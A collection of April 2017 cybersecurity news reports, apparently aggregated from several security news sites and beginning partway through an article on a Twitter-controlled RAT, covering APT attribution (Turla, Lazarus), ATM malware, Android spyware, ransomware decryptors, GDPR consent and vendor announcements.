The RAT shows increased complexity by using legitimate websites such as Twitter, Yandex, and Mediafire as its C&C communication and exfiltration platforms. Not only are these websites difficult to block globally within organizations, but they also use HTTPS connectivity, which makes it difficult to identify specific patterns.

“One of the samples analyzed only uses Twitter to interact with the RAT, while the second one additionally uses the cloud platforms: Yandex and Mediafire. The Twitter tokens we were able to extract are the same in both variants. There is obvious ongoing effort to add features to this RAT to allow for more sophisticated levels of attacks,” Talos notes.

Upon analysis, the security researchers discovered that the RAT doesn’t work on Windows XP systems and also packs detection evasion capabilities, as it checks the compromised system for a series of tools used for malware analysis or within sandbox environments. Should such tools be discovered, the malware jumps to a fake function which generates dummy HTTP traffic.

For communication with the C&C platforms, the malware uses 12 hardcoded tokens (7 different Twitter API tokens, 4 Yandex tokens, and one Mediafire account). The malware checks the last message on the Twitter timeline to receive orders and can also tweet; and can download and execute files or upload stolen documents to disks in the Yandex cloud or Mediafire.

The malware also packs keylogging capabilities, and one of the samples was also observed taking screenshots of the infected systems, researchers say.

The actor behind this campaign is a motivated one, Talos notes. The RAT is innovative, using novel communication channels that are difficult to contain within organizations. Furthermore, the malware includes a series of exotic features, such as the ability to perform requests to legitimate websites (Amazon and Hulu) if executed in a sandbox.

“This investigation shows us once again that South Korean interests sophisticated threat actors. In this specific case, the actor compromised a legitimate email address of a big forum organized by a university in Seoul in order to forge the spear phishing email which increased the chance of success. And we know that it was a success, during the writing of the article we identified infected systems communicating with the command & control previously mentioned,” Talos concludes.


NoMoreRansom Expands with New Decryptors, Partners

4.4.2017 securityweek Virus
NoMoreRansom, a project launched in 2016 by Europol, the Dutch National Police, Kaspersky Lab and Intel Security (now once again McAfee) has published its latest progress report. NoMoreRansom collects the available ransomware decryption tools into a single portal that victims can use to recover encrypted files without having to pay the criminals.

Since the last Europol update in December 2016, the project's decryption library has been supplemented by the addition of 15 new decryption tools. The catalogue of project partners has expanded by 30 to 76 public and private members, including the law enforcement agencies of Australia, Belgium, Israel, South Korea, Russia and Ukraine; and Interpol. SentinelOne and Verizon Enterprise Solutions are among the new private members.

The full list of available decryption tools can be found here, while the project members can be found here.

According to Europol, 10,000 ransomware victims from all over the world have regained their files through NoMoreRansom since the last December update. Statistics show that most visitors to the platform come from Russia, the Netherlands, the United States, Italy and Germany.

One of the new decryptors, provided by Bitdefender, rescues files from the Bart family of ransomware. "The tool," says Bitdefender, "is a direct result of successful collaboration between Bitdefender, Europol and Romanian police, supporting the 'No More Ransom' initiative kick started by Europol's European Cybercrime Centre."

Unlike other ransomware families, Bart does not require an internet connection to encrypt the victim's files, although one is required to receive the decryption key from the attacker's C&C server. The malware doesn't function if the computer's language is detected as Russian, Belorussian, or Ukrainian -- "most probably," suggests Bitdefender, "because it was written by a Russian speaking hacker."

The developers of Bart are the same criminal gang as those behind the Dridex and Locky ransomware strains.

Losses to ransomware continue to increase, rising by 300% from 2015 to 2016 to an estimated total of $1 billion. Estimates for 2017 indicate that the threat is still growing.


Kantara Initiative Assists With EU Privacy and GDPR Issues

4.4.2017 securityweek Privacy
The US-based Kantara Initiative announced today that it has joined the European Trust Foundation to help its non-EU government and corporate members engage with Europe on pan-jurisdiction federated digital identity, trust and privacy initiatives.

The advent of the General Data Protection Regulation (GDPR) turns Kantara's development of good business practices into legal requirements for any enterprise that has a single customer within the European Union. The new alliance will make it easier for US business to engage with the European Commission over such issues.

There are still fundamental misconceptions in the common understanding of the GDPR: firstly, that it only involves European companies; and secondly, that it solely concerns the protection of personal data from being hacked. Neither are true. Any company anywhere in the world that trades with Europe is affected; and data protection now involves far more than the protection of data. GDPR shifts emphasis from company security to involved customer protection: secure customer relations are now a focus.

The issue is demonstrated by GDPR's 'consent' requirements. For a business to process personal data, it must now obtain consent, defined in article 4(11) as "any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she by statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her."

The detail, requiring explicit informed consent (tick boxes and obscure T&Cs are no longer sufficient) will require changes to business practices. But consent can also be withdrawn -- and that will require changes to business processes. Commercial enterprises will need to manage consent as effectively as they manage identity; and indeed, the two become woven together.

This is where Kantara comes in. Its Consent Receipt Specification is a record of consent provided to an individual at the time the consent is given. The purpose is effectively to verify a consent contract, but it also provides a mechanism for the withdrawal of that consent. Coupled with a second evolving Kantara specification, User Managed Access (UMA) -- which enables the user to control how his or her data is shared -- these new initiatives could help provide a solution to the GDPR consent requirements.

Kantara's new relationship with the European Trust Foundation, which has a history of working closely with the European Commission, will help US consent mechanisms be accepted as adequate for the GDPR. But it is not just a one-way matter of compliance. It doesn't simply provide part of the legal basis for the transfer of personal data out of the EU; it is also part of the legal basis for making automated decisions relating to that personal information.

Consent receipts and user managed access are not simply a GDPR solution, they are good practices for the modern world. User trust in vendors' use of PII is low. If that can be improved so that secure customer relations can replace old-style hidden and obfuscated personal data collection, then new avenues for business will emerge.

In Kantara's own words, "When individuals are forced to sign organization-centric privacy policies/ terms of use, then this places limitations on the information that will be shared. If such constraints were removed, and capabilities built on the side of the individual, then new, rich information will flow -- including actual demand data (as opposed to derived/ predicted demand)."

But whatever solutions to GDPR requirements are chosen by US (or any non-EU) business, they will need to be accepted as adequate by the European Union -- and this is the aim of the new relationship between Kantara and the European Trust Foundation. "The European Trust Foundation aims to provide a valuable service to Kantara members located outside of Europe by helping to streamline the engagement process with the EU," said Colin Wallis, executive director, Kantara Initiative. "The foundation and organizations like Kantara act as a 'staging area' to help expedite the process of gathering information and presenting a common voice for non-EU countries to approach and engage with the EU on GDPR."


Google Announces New Accounts Sign-in Rules

4.4.2017 securityweek Safety
Google on Monday announced the rollout of a new Accounts sign-in page and of a series of updates to the policies that 3rd-party Single Sign-On (SSO) providers should comply with.

Starting on April 5, 2017, users will benefit from an updated experience when securely signing into their accounts, courtesy of a new Google Accounts login page. The new design, Google says, is meant to make the browser login experience consistent across computers, phones and tablets.

This change, Google also announced, is expected to impact organizations that use third-party applications within their networks, as well as those using a third-party SSO provider. “We recommend contacting your developer(s) or SSO provider to see if any updates are necessary,” Google says.

In a separate announcement, the Internet giant revealed that the changes affect Google and 3rd-party applications on iOS, mobile browsers on iOS and Android, and web browsers (Chrome, Firefox and other modern browsers).

Starting April 5, users of 3rd-party SSO providers will be better informed on the account they’re authenticating as well as the permissions they’re granting to applications. Android applications using the standard authentication libraries are already prompting users to select appropriate account information, meaning that these changes won’t impact them as well, the company reveals.

“It’s important that your users are presented with account information and credential consent, and apps should make this process easy and clear. One new change that you may now see is that only non-standard permission requests will be presented in the secondary consent screen in your application,” Google explains.

At the moment, app permissions requested by an application are displayed together, but users should have greater visibility into permissions being requested beyond the standard “email address” and “profile” consent, Google says. If additional permissions are requested by the app, a secondary consent screen is displayed.

Users will also have greater visibility into the 3rd-party application’s name and will also be able to click-through to get the developer’s contact information. Thus, application developers should use public-facing email addresses so that users could easily contact them for support or assistance.

“If your application may also be used by G Suite customers that employ a 3rd-party Single Sign-On (SSO) service, we recommend that you utilize the hd and/or login_hint parameters, if applicable. Even with the changes to the 3rd-party SSO auth flow, these parameters will be respected if provided. You can review the OpenID Connect page in the documentation for more information,” Google also notes.

G Suite users may notice redirection when signing into 3rd-party SSO providers as well. When no accounts are signed in, the user will be prompted to confirm the account after signing in to the 3rd-party SSO provider, which is meant to ensure that they’re signed in with the correct G Suite account. Users automatically opt into “email address” and “profile” consent, but will be redirected back to the application once they consent to any additional non-standard permissions that may be requested.

If the user is already signed in to one or more accounts matching the hd hint, the Account Chooser will display all the accounts and the user will have to select the appropriate G Suite account. Next, the user will be redirected to the 3rd-party SSO provider, then back to the application.


Turla Linked to One of the Earliest Cyberespionage Operations

4.4.2017 securityweek Virus
Researchers at Kaspersky Lab and King’s College London have identified a link between the Russian-speaking threat actor Turla and Moonlight Maze, one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In around 1996, a threat group believed to be located in Russia had started spying on organizations in the United States, including the Pentagon, the Department of Energy and NASA. The actor had stolen vast amounts of sensitive information from universities, military and research organizations. The activities of the group, dubbed Moonlight Maze, were first made public in 1999 and detailed last year at Kaspersky’s SAS conference by Thomas Rid of King's College London.

Experts have dug further into Moonlight Maze’s activities and at this year’s SAS conference they presented evidence linking the threat actor to Turla. If Turla does in fact turn out to be an evolution of Moonlight Maze, that would make it one of the earliest and longest cyber espionage operations, along with the NSA’s Equation Group, which is also believed to have been active since the mid ‘90s.

Turla is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig). The threat actor has been linked to the Agent.BTZ malware, which indicates that Turla may have been active since as early as 2006.

Kaspersky and King’s College London researchers found precious information after learning of David Hedges, a now-retired administrator who got to watch Moonlight Maze in action when one of his servers was compromised by the threat group back in 1998. Hedges had allowed the attackers to use his server in order to help the Metropolitan Police in London and the FBI track the team’s activities.

Hedges still had the old server, which recorded data between 1998 and 1999, allowing the researchers to analyze the tools used at the time by Moonlight Maze.

The analysis showed that the attackers compiled most of their tools on UNIX operating systems such as Solaris and IRIX. One of the third-party tools they used was LOKI2, an open-source backdoor released in 1996.

LOKI2 has provided a link to Penquin Turla, a Linux backdoor identified by Kaspersky Lab in 2014. Penquin Turla’s code was compiled for Linux kernel versions released in 1999, and the malware was based on LOKI2, which had been designed for covert data exfiltration.

Researchers believe the Penquin Turla codebase was primarily developed between 1999 and 2004, but the malware was also spotted in the 2011 attack on Swiss defense firm RUAG, and a new sample was uploaded to the VirusTotal service in March 2017. The experts’ theory is that the hackers dusted off the old code and reused it in attacks aimed at highly secure entities whose defenses may have been more difficult to breach using the group’s typical Windows toolset.

While the use of LOKI2 source code and other similarities do provide a link between Turla and Moonlight Maze, more evidence is needed before researchers can say with certainty that the former is an evolution of the latter.

Further evidence may be found in data collected from a campaign dubbed Storm Cloud. The Wall Street Journal reported in 2001 that this operation had also involved LOKI2, but researchers currently have little information on Storm Cloud.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

Considered to be one of the largest and most successful cyber heists ever, Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group responsible for financial profit exists, which they have dubbed Bluenoroff.

In February, researchers discovered an attack aimed at banks in Poland that were linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab was able to detect malware samples relating to Lazarus group activity that appeared in financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”

North Korea Cyber Attack Attribution

Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.

 


Hackers stole $800,000 from ATMs using Fileless Malware
4.4.2017 thehackernews Virus
Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night, but the method used by the intruders remained a complete mystery with CCTV footage just showing a lone culprit walking up to the ATM and collecting cash without even touching the machine.
Even the affected banks could not find any trace of malware on its ATMs or backend network or any sign of an intrusion. The only clue the unnamed bank's specialists found from the ATM's hard drive was — two files containing malware logs.
The log files included the two process strings containing the phrases: "Take the Money Bitch!" and "Dispense Success."
This small clue was enough for the researchers from the Russian security firm Kaspersky, who have been investigating the ATM heists, to find malware samples related to the ATM attack.
In February, Kaspersky Labs reported that attackers managed to hit over 140 enterprises, including banks, telecoms, and government organizations, in the US, Europe and elsewhere with the 'Fileless malware,' but provided few details about the attacks.
According to the researchers, the attacks against banks were carried out using a Fileless malware that resides solely in the memory (RAM) of the infected ATMs, rather than on the hard drive.
Now during the Kaspersky Security Analyst Summit in St. Maarten on Monday, security researchers Sergey Golovanov and Igor Soumenkov delved into the ATM hacks that targeted two Russian banks, describing how the attackers used the fileless malware to gain a strong foothold into bank's systems and cash out, ThreatPost reports.
Mysterious ATM Hack Uncovered by Researchers
kaspersky-fileless-malware
Dubbed ATMitch, the malware — previously spotted in the wild in Kazakhstan and Russia — is remotely installed and executed on ATMs via its remote administration module, which gives hackers the ability to form an SSH tunnel, deploy the malware, and then sending the command to the ATM to dispense cash.
Since Fileless malware uses the existing legitimate tools on a machine so that no malware gets installed on the system, the ATM treats the malicious code as legitimate software, allowing remote operators to send the command at the time when their associates are present on the infected ATM to pick up the money.
This ATM theft takes just a few seconds to be completed without the operator physically going near the machine. Once the ATM has been emptied, the operator 'signs off,' leaving a very little trace, if any, of the malware.
However, this remote attack is possible only if an attacker tunnels in through the bank's back-end network, a process which required far more sophisticated network intrusion skills.
A Very Precise Form of Physical Penetration
Since opening the ATM's panel directly could also trigger an alarm, attackers switched to a very precise form of physical penetration: Drilling a golf-ball sized hole in ATM's front panel to gain direct access to the cash dispenser panel using a serial distributed control (SDC RS485 standard) wire.
This method was revealed when Golovanov and Soumenkov were able to reverse engineer the ATM attack after police arrested a man dressed as a construction worker while he was drilling into an ATM to inject malicious commands in the middle of the day to trigger the machine’s cash dispenser.
The suspect was arrested with a laptop, cables, and a small box. Although the researchers did not name the affected ATM manufacturer or the banks, they warn that ATM burglars have already used the ATM drill attack across Russia and Europe.
In fact, this technique also affects ATMs around the world, leaving them vulnerable to having their cash drawn out in a matter of minutes.
Currently, the group or country behind these ATM hacks is unknown, but coding present in the attack contains references to the Russian language, and the tactics, techniques, and procedures bear a resemblance to those used by bank-robbing gangs Carbanak and GCMAN.
Fileless malware attacks are becoming more frequent. Just last month, researchers found a new fileless malware, dubbed DNSMessenger, that uses DNS queries to conduct malicious PowerShell commands on compromised computers, making the malware difficult to detect.


Google just discovered a dangerous Android Spyware that went undetected for 3 Years
4.4.2017 thehackernews Android
An Android version of one of the most sophisticated mobile spyware has been discovered that remained undetected for at least three years due to its smart self-destruction capabilities.
Dubbed Chrysaor, the Android spyware has been used in targeted attacks against activists and journalists mostly in Israel, but also in Georgia, Turkey, Mexico, the UAE and other countries.
Chrysaor espionage malware, uncovered by researchers at Lookout and Google, is believed to be created by the same Israeli surveillance firm NSO Group Technologies, who was behind the Pegasus iOS spyware initially detected in targeted attacks against human rights activists in the United Arab Emirates last year.
NSO Group Technologies is believed to produce the most advanced mobile spyware on the planet and sold them to governments, law enforcement agencies worldwide, as well as dictatorial regimes.

The newly discovered Chrysaor spyware has been found installed on fewer than three-dozen Android devices, although researchers believe that there were more victims before its detection, who most likely have either formatted or upgraded their phones.
"Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps," Google said in its own blog post published Monday.
"We've contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users."

Just like Pegasus for iOS, the newly discovered Chrysaor for Android also offers a wide array of spying functions, including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
"If it feels like it's going to be found, it removes itself," said Lookout Security researcher Michael Flossman. "That's why it took so long to find these samples."
Researchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.
While Pegasus leveraged three then-zero day vulnerabilities in Apple's iOS operating system to jailbreak the targeted iOS devices, Chrysaor uses a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the operating system.
Since Chrysaor dates back to 2014, there are possibilities that NSO group might have discovered zero-day vulnerabilities in Android and deployed them on the latest version of Chrysaor for Android, Lookout warned.
Lookout has also provided full, technical details on Chrysaor in its report [PDF] titled "Pegasus for Android: Technical Analysis and Findings of Chrysaor." So, you can head on to the link for a more detailed explanation on the malware.
How to Protect your Android device from Hackers? Google recommends users to install apps only from reputable sources, protect your device with pin or password lock, enable ‘verify apps’ feature from settings, and obviously, keep your device always up-to-date with the latest security patches.


Malware Allows Remote Administration of ATMs

4.4.2017 securityweek Virus
A recently discovered piece of malware allows attackers to remotely control compromised ATMs (automated teller machines), Kaspersky Lab reveals.

The threat was discovered after a Russian bank was hit by a targeted attack where cybercriminals gained control of ATMs and uploaded malware to them. Although the actors did remove the malware after the heist, which left researchers without an executable to analyze, the malware’s logs and some file names were restored after the attack, which Kaspersky researchers were able to analyze.

The files were recovered by the bank’s forensic team, which provided the security researchers with two text files (located at C:\Windows\Temp\kl.txt and C:\logfile.txt), and the names of two deleted executables (C:\ATM\!A.EXE and C:\ATM\IJ.EXE). However, the contents of the exe files couldn’t be retrieved, Kaspersky notes.

Based on the information retrieved from the log files, the researchers created a YARA rule to find a sample, and eventually found one, in the form of “tv.dll”. This in turn led to the discovery of ATMitch, a piece of malware that essentially provides attackers with the ability to remotely administrate ATMs.

The malware is installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank. Once on the infected machine, the threat looks for the “command.txt” file located in the same directory as the malware itself, as this file includes a list of one character commands: ‘O’ – Open dispenser; ‘D’ – Dispense; ‘I’ – Init XFS; ‘U’ – Unlock XFS; ‘S’ – Setup; ‘E’ – Exit; ‘G’ – Get Dispenser id; ‘L’ – Set Dispenser id; and ‘C’ – Cancel.

After that, the malware writes the results of the command to the log file and removes “command.txt” from the ATM’s hard drive. ATMitch, which apparently doesn’t try to conceal within the system, uses the standard XFS library to control the ATM, meaning that it can be used on all ATMs that support the XFS library.

The !A.exe and IJ.exe executables, which might be the installer and uninstaller of the malware, couldn’t be retrieved. “tv.dll”, the researchers say, contained one Russian-language resource.

This attack, Kaspersky notes, was connected to a fileless attack detailed in February 2017, which targeted numerous organizations worldwide. The attack, Morphisec revealed last month, was tied to an attack framework used in a series of other incidents detailed by Cisco and FireEye as well.


Apple Updates iOS to Patch Wi-Fi Vulnerability

4.4.2017 securityweek iOS
Apple has released an emergency security update for its iOS operating system to address a serious vulnerability affecting the Wi-Fi component.

According to the tech giant, the flaw is a stack-based buffer overflow that allows an attacker who is within range to execute arbitrary code on the Wi-Fi chip.

The security hole, tracked as CVE-2017-6975, has been addressed with the release of iOS 10.3.1 through improved input validation, Apple said. The update is available for iPhone 5 and later, iPod touch 6th generation and later, and iPad 4th generation and later.

9to5 Mac reported that while iOS 10.3 dropped support for 32-bit devices, the latest update reintroduces support for these systems.

The vulnerability was identified and reported by Gal Beniamini of Google Project Zero, which typically discloses the details of flaws found by its researchers after 90 days.

In a security advisory submitted to the Full Disclosure mailing list, Apple advised users to install the update immediately if possible, and pointed out that the update is only available through iTunes and the Software Update utility on the iOS device; the update will not show up on the Apple Downloads website or in the computer's Software Update application.

iOS 10.3.1 was released just one week after Apple announced the general availability of iOS 10.3, which brings many new features and patches for nearly 90 vulnerabilities. Roughly 30 of these security holes were reported to Apple by Google Project Zero researchers.


It's Official: McAfee Breaks Away from Intel With New Logo

4.4.2017 securityweek IT
McAfee Spins Out from Intel as a New Independent Company With Refreshed Logo

McAfee, one of the best known and persistent brands in cybersecurity, has re-emerged from Intel as an independent company. It was acquired by Intel for $7.68 billion in 2010. In 2014, Intel announced the McAfee brand would be phased out and replaced by Intel Security, although retaining the red shield logo. In September 2016, Christopher Young, SVP and GM of the Intel Security Group, announced that McAfee would again be an independent company -- 49% owned by Intel and 51% owned by TPG. This transaction values the company at $4.2 billion.

The spin out is now complete, and McAfee is again an independent company. In this incarnation, the name is retained, but the original red shield logo is replaced by a stylized red shield and includes the epithet 'Together is power.' Chris Young is the CEO.

New McAfee LogoThe McAfee brand has proved remarkably resilient over the years. It was one of the earliest security brands, and has survived the disdain of its original developer, the somewhat maverick John McAfee. But it has greater challenges ahead. To really succeed, Chris Young will need to transform an image associated with early, signature-based, legacy anti-virus into something more contemporary.

New McAfee Logo

The original anti-virus companies -- almost all now more than just AV -- were caught napping by the second-generation AV companies, who marketed themselves as machine-learning (ML) endpoint protection firms. The general perception is that machine-learning and artificial intelligence is the way forward, evidenced by another legacy firm, Sophos, buying ML firm Invincea. Young will need to transform public perception of an old brand into something more dynamic and forward thinking.

McAfee's plan is to achieve this by evolution rather than revolution. There are no major new security initiatives announced today, although a raft of new products were announced at the end of 2016. "We will continue to be very focused on our customers. The strategy outlined at our annual security conference, FOCUS 16, will be the same. We are focused on end-to-end solutions and pivoting to the cloud," says the company.

McAfee's vision is to accelerate its existing strategy to drive cybersecurity towards true automation, not just for itself but across the whole industry. Its belief is that it can better focus on this strategy as an independent company.

"Security is the fastest-growing, but also the most fragmented and least profitable of all parts of IT," corporate VP of global products at Intel Security, Brian Dye, told SecurityWeek. "That tells us we're doing something fundamentally wrong." He believes that automation is the solution to weak security, fragmentation, and profitability. "We want to drive a level of automation across the industry and bring that level of automation into our own portfolio -- being standalone lets us focus on that mission wholeheartedly."

He describes McAfee's path as an evolution from integration, "which is what we've done historically with ePolicy Orchestrator's single management pane of glass for the SOC;" to automation, "which is what we are doing with the Data Exchange Layer (DXL);" and ultimately on towards full orchestration, "which will bring together and automate more and more complex and sophisticated workflows."

Key to this evolution is the big data threat intelligence derived from the telemetry of millions of customers on endpoints and corporate servers across the globe driving automation, through machine learning and artificial intelligence, across the DXL fabric. The aim is to move towards full closed loop zero human touch automation wherever possible; and improved human/machine teaming elsewhere.

DXL allows the sharing of actionable threat intelligence not just across the McAfee portfolio, but also between the products of partners in the McAfee Security Innovation Alliance. Dye believes that increasing and improving machine learning will allow full automation across the whole SOC; and that DXL will provide the backbone of that automation.

But he sees this as not merely a vision but a necessity for the future. "The only way we will be able to adapt to the changes that are happening, from the cloud to edge computing and the IoT, is if we automate the security tasks across the industry," he told SecurityWeek. "We have to do that to free up the people and bandwidth to allow the implementation of these changes and new technologies. When new technologies arrive, you simply plug them into the DXL fabric. Change becomes an accelerator not an inhibitor; and it is our belief is that this is required for industry to be successful."

Through DXL and threat intelligence, he said, "we can drive the rebirth of one of cybersecurity's best known brands."


Honeywell SMX Protects Industrial Sites From USB Threats

4.4.2017 securityweek Cyber
Honeywell SMX

Honeywell announced on Tuesday the launch of a new product designed to protect industrial facilities from USB-borne threats by providing a simple way for organizations to track the removable media devices connected to their systems.

The new product, Secure Media Exchange (SMX), has two main components: an intelligence gateway and a piece of software installed on endpoints.

When a contractor wants to use a USB drive in a protected organization, they need to check the device at the intelligence gateway, a touchscreen system that can reside at the physical front desk or another location where it can be easily accessed by visitors.

Before entering the facility, users are prompted to complete a check-in procedure by connecting their USB drive to the gateway. The files stored on the drive are verified by Honeywell’s Advanced Threat Intelligence Exchange (ATIX) cloud service, which relies on both signatures and behavior analysis (i.e. running suspicious files in a special ICS sandbox) to identify known and zero-day threats.

According to Honeywell, the check-in process typically takes as long as a regular malware scan, depending on the size of the drive and the number of files. The ATIX service checks for known good and known bad files to expedite the process, and the scan can also be sped up by quarantining all files except for the ones that need to be used.

Once the process has been completed, the user can take the USB device and attach it to any endpoint within the organization. Devices that have not been checked by the gateway (e.g. a contractor wants to connect their smartphone for charging) will be blocked from using the endpoint's USB port.

The SMX client software running on endpoints will ensure that access to the files on a device is restricted if the check-in process has not been completed or if signs of tampering are detected.

In order to prevent malware from entering an organization, suspicious files are quarantined inside a password-protected archive file. Administrators can also block specific file types from getting into the facility.

When a contractor leaves the site, they will need to complete a check-out process at the SMX gateway. Failure to complete the process can result in the inability to access the files on the removable media device from a different computer. However, Honeywell says there are mechanisms in place to allow users to conduct the check-out process at a later time (e.g. a contractor could forget to complete the process when leaving an offshore platform via helicopter).

In addition to giving the user access to his/her files, the check-out process is designed to scan the device once again for malware in an effort to identify any threats that may already be inside the plant.

There have been several high-profile incidents where USB drives had been used to plant malware on an industrial network, including the notorious Stuxnet attacks and a 2013 incident that affected two US power plants.

Malware delivered via removable media is considered one of the biggest threats to industrial environments, but this type of storage is often required to perform updates. The risk is not easy to address, especially since, according to Honeywell, on average, an organization has seven different brands of control systems that require USB updates, and the number of daily contractors on site ranges between 25 and 150.


IAAF Says Russia-Linked Hackers Accessed Medical Records

4.4.2017 securityweek Hacking

The International Association of Athletics Federations (IAAF) revealed on Monday that athletes' medical records were accessed in an attack the organization believes was carried out by the Russia-linked cyber espionage group known as Fancy Bear.

Fancy Bear is also known as APT28, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team. The group is said to be responsible for many high-profile attacks, including the recent U.S. election hacks.

The IAAF, which is based in Monaco, said it learned of the breach after it hired incident response firm Context Information Security in January to conduct a technical investigation. Investigators found signs of unauthorized remote access on February 21, when they discovered metadata on athletes' Therapeutic Use Exemption (TUE) applications stored in a newly created file.

The breach impacts athletes who have applied for TUEs since 2012. Affected individuals have been contacted by the IAAF.

It's unclear if the attackers managed to exfiltrate the information they collected, but IAAF believes this provides a strong indication of what the attackers were after. The IAAF is confident the threat actor no longer has access to its networks following clean-up efforts assisted by Context, the UK National Cyber Security Centre (NCSC), and the Agence Monégasque de Sécurité Numérique (Monaco AMSN).

This is not the first time Fancy Bear has been accused of targeting an athletic organization. Last year, the World Anti-Doping Agency (WADA) said the hackers had stolen sensitive athlete data, including medical test results and TUEs.

Researchers linked the attack on WADA to the Fancy Bear cyberspies, but a group calling itself “Fancy Bears,” claiming to be affiliated with the Anonymous hacktivist movement, also took responsibility for the breach and leaked some of the stolen files.

In the WADA attack, hackers gained unauthorized access to the Anti-Doping Administration and Management System (ADAMS) after using a fake website to phish credentials. In the case of IAAF, there is no information on how the attackers may have gained access to the organization’s systems.


Joining the dots between the ancient Moonlight Maze espionage campaigns and the Turla APT
4.4.2017 securityaffairs Virus

Experts at Kaspersky presented the findings of its research that definitively connect the Moonlight Maze cyber espionage campaigns to the Turla APT group.
One year ago, the researcher Thomas Rid at the Security Analyst Summit disclosed the alleged links between the Moonlight Maze cyber espionage operation of mid 1990s and the Turla APT.

Today at the annual Kaspersky Lab conference, Rid, along security experts Costin Raiu and Juan Andres Guerrero-Saade presented the findings of its research that definitively connect the Moonlight Maze cyber espionage campaigns to the Russian APT group.


Moonlight Maze is the code name assigned to one of the first detected cyber espionage campaigns that targeted a number of critical U.S. government agencies, including the Pentagon, NASA and the Department of Energy.

Threat actors behind the Moonlight Maze were focused on UNIX systems such as Sun Solaris, while the Turla APT is more specialized in attacks on Windows systems.

The researchers speculated that the missing link between the two cyber espionage operations lies in the Penquin Turla attacks dated back 2011 and spotted by Kaspersky Lab in 2014. Penguin Turla was designed to compromise Linux machines with a backdoor based on the open-source LOKI2 backdoor that was released in Phrack magazine in September 1997.

